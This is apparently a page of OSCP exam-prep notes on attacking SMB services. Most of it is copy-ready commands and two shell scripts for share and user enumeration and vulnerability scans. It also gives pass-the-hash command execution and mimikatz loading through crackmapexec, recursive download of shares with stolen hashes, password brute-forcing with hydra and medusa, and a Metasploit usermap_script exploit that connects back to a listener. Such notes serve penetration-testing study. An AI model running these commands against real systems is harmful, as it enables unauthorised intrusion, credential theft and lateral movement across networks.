OSCP Notes
Search…
SMB

Scanning for the NetBIOS Service

1
nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
Copied!
1
nbtscan -r 192.168.1.0/24
Copied!

Checklist

Enumerate Hostname

1
$ nmblookup -A $ip
Copied!

List Shares

1
smbmap -H $ip
Copied!
1
echo exit | smbclient -L \\\\$ip
Copied!
1
nmap --script smb-enum-shares -p 139,445 $ip
Copied!

Check Null Sessions

1
smbmap -H $ip
Copied!
1
rpcclient -U "" -N $ip
Copied!
1
smbclient \\\\$ip\\[share name]
Copied!
1
smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
2
3
# if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
Copied!

Check for Vulnerabilities

1
nmap --script smb-vuln* -p 139,445 $ip
Copied!

Overall Scan

1
enum4linux -a $ip
Copied!
1
enum4linux -u 'guest' -p '' -a $ip
Copied!

Manual Inspection

1
smbver.sh $ip (port)
Copied!

List smb nmap scripts

1
locate .nse | grep smb
Copied!

Google to see if version is vulnerable

1
SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename
2
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename
Copied!

Nmap Script

Quick enum

1
nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
Copied!

Quick vuln scan

1
nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
Copied!

Full enum and vuln scanning

1
nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
Copied!
1
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
Copied!

Vulnerable versions

    1.
    Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
    2.
    Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
    3.
    Most Samba (Unix) servers
List of SMB versions and corresponding Windows versions:
    1.
    SMB1 – Windows 2000, XP and Windows 2003.
    2.
    SMB2 – Windows Vista SP1 and Windows 2008
    3.
    SMB2.1 – Windows 7 and Windows 2008 R2
    4.
    SMB3 – Windows 8 and Windows 2012.

CrackMapExec

1
crackmapexec -u 'guest' -p '' --shares $ip
2
crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip
3
crackmapexec -u 'guest' -p '' --users $ip
4
crackmapexec smb 192.168.1.0/24 -u Administrator -p [email protected]
5
crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
6
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz 192.168.1.0/24
7
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
8
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution
Copied!

smbmap

Works well for listing and downloading files, and listing shares and permissions. Hashes work. Code execution don't work.
1
smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
2
smbmap -u guest -p '' -H $ip
3
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
4
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
5
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
6
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work
7
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work
Copied!

Download all files

1
smb: \> RECURSE ON
2
smb: \> PROMPT OFF
3
smb: \> mget *
Copied!

Downloads a file in quiet mode

1
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
Copied!

Recursively list dirs, and files

1
smbmap -R $sharename -H $ip
Copied!

smbver.sh

1
#!/bin/sh
2
#Author: rewardone
3
#Description:
4
# Requires root or enough permissions to use tcpdump
5
# Will listen for the first 7 packets of a null login
6
# and grab the SMB Version
7
#Notes:
8
# Will sometimes not capture or will print multiple
9
# lines. May need to run a second time for success.
10
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
11
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
12
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
13
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
14
sleep 0.5 && echo ""
Copied!

smbenum.sh

1
#!/bin/bash
2
# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
3
# SECFORCE - Antonio Quina
4
# All credits to Bernardo Damele A. G. <[email protected]> for the ms08-067_check.py script
5
6
IFACE="eth0"
7
8
if [ $# -eq 0 ]
9
then
10
echo "Usage: $0 <IP>"
11
echo "eg: $0 10.10.10.10"
12
exit
13
else
14
IP="$1"
15
fi
16
17
echo -e "\n########## Getting Netbios name ##########"
18
nbtscan -v -h $IP
19
20
echo -e "\n########## Checking for NULL sessions ##########"
21
output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`
22
echo $output
23
24
echo -e "\n########## Enumerating domains ##########"
25
bash -c "echo 'enumdomains' | rpcclient $IP -U%"
26
27
echo -e "\n########## Enumerating password and lockout policies ##########"
28
polenum $IP
29
30
echo -e "\n########## Enumerating users ##########"
31
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP
32
bash -c "echo 'enumdomusers' | rpcclient $IP -U%"
33
bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt
34
35
echo -e "\n########## Enumerating Administrators ##########"
36
net rpc group members "Administrators" -I $IP -U%
37
38
echo -e "\n########## Enumerating Domain Admins ##########"
39
net rpc group members "Domain Admins" -I $IP -U%
40
41
echo -e "\n########## Enumerating groups ##########"
42
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP
43
44
echo -e "\n########## Enumerating shares ##########"
45
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP
46
47
echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
48
hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
49
rm /tmp/$IP-users.txt
Copied!

Brute force login

1
medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
Copied!
1
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv
Copied!

Null Session

Null session and extract information.

1
nbtscan -r $ip
Copied!

Version

1
msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run
Copied!

MultiExploit

1
msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run
Copied!

Eternal Blue

Vulnerable versions

Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016
1
nmap -p 445 $ip --script=smb-vuln-ms17-010
Copied!

Bruteforce password

1
hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
Copied!

Connection

1
smbclient -L 192.168.1.102
Copied!
1
smbclient //192.168.1.106/tmp
Copied!
1
smbclient \\\\192.168.1.105\\ipc$ -U john
Copied!
1
smbclient //192.168.1.105/ipc$ -U john
Copied!

Exploitation

    Gather version numbers
    Searchsploit
    Default Creds
    Creds previously gathered
    Download the software
Last modified 1yr ago